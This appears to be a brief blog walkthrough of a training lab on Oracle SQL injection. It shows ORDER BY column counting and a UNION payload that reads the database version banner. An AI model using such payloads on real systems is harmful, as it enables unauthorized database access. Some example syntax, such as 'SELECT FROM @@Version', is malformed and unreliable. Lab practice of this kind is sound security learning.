Lab 7 : SQL injection attack, querying the database type and version on Oracle

StarMan

Problem Statement :

This lab contains an SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.

To solve the lab, display the database version string.

Requirements :

Make the database retrieve the strings: ‘Oracle Database 11g Express Edition Release 11.2.0.2.0 – 64bit Production, PL/SQL Release 11.2.0.2.0 – Production, CORE 11.2.0.2.0 Production, TNS for Linux: Version 11.2.0.2.0 – Production, NLSRTL Version 11.2.0.2.0 – Production’

Solution:

So there are various methods to get the version of the database. Depends on which DB you are using Example is it MS SQL or Is it Oracle.

So we need to run the query like to get the version of the database.

Example

SELECT FROM @@Version

SELECT BANNER FROM V$VERSION

STEPS followed –

  1. Again same method used. First used ORDER by 1 / 2 etc.. To find the number of columns in this.
  2. Next is UNION attack command to retrieve the data in one single column.

' UNION SELECT BANNER, NULL FROM V$VERSION

Example from MYSQL Database

Advertisement

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s